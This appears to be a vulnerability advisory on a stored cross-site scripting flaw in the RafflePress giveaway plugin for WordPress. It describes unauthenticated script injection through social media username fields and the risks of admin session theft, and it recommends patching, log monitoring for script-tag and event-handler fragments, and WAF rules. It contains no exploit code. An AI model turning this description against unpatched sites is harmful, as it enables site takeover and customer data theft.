A high-severity vulnerability exists in the "Giveaways and Contests by RafflePress" WordPress plugin, allowing attackers to inject malicious code into the website. This code is then stored on the server and executed in the browsers of other users, including administrators, which could lead to website takeover, data theft, or redirection to malicious sites. Organizations using this plugin are at significant risk of compromise and should apply updates immediately.

The vulnerability is a Stored Cross-Site Scripting (XSS) flaw. An unauthenticated attacker can inject malicious JavaScript code into various social media username fields when interacting with a giveaway or contest form created by the plugin. Because the plugin fails to properly sanitize this user-supplied input before storing it in the database, the malicious script is saved. When a privileged user, such as an administrator, views the contest entries or related data in the WordPress dashboard, the stored script executes within their browser, granting the attacker the ability to perform actions on behalf of the administrator, steal session cookies, or inject further malware.

This vulnerability is rated as High severity with a CVSS score of 7.2. Successful exploitation could have a significant business impact, including the complete compromise of the website's administrative account. This could lead to website defacement, theft of sensitive customer data (such as email lists and personal information collected by the plugin), reputational damage, and loss of customer trust. Furthermore, a compromised website can be used to host phishing campaigns or distribute malware, potentially leading to blacklisting by search engines and security vendors.

Immediate Action: Immediately update the "Giveaways and Contests by RafflePress" plugin to the latest version, which contains a patch for this vulnerability. If the plugin is no longer required for business operations, it is recommended to deactivate and uninstall it completely to reduce the website's attack surface.

Proactive Monitoring: Monitor web server access logs for suspicious POST requests to pages associated with the RafflePress plugin, specifically looking for payloads containing HTML script tags (e.g., <script>, onerror=, onload=) in parameters related to social media usernames. Regularly review the website's front-end and back-end for any unauthorized or unusual code injections.

Compensating Controls: If immediate patching is not feasible, deploy a Web Application Firewall (WAF) with rules designed to detect and block common XSS attack patterns. A properly configured WAF can filter malicious input before it reaches the application, providing a layer of defense against this type of attack.

Public Exploit Available: false

Given the high severity (CVSS 7.2) of this vulnerability and its potential for full website compromise, we strongly recommend that all organizations using the "Giveaways and Contests by RafflePress" plugin prioritize applying the security update immediately. Although this CVE is not currently listed on the CISA KEV catalog, the risk of data theft and reputational damage is substantial. A proactive patching strategy is the most effective way to mitigate this threat.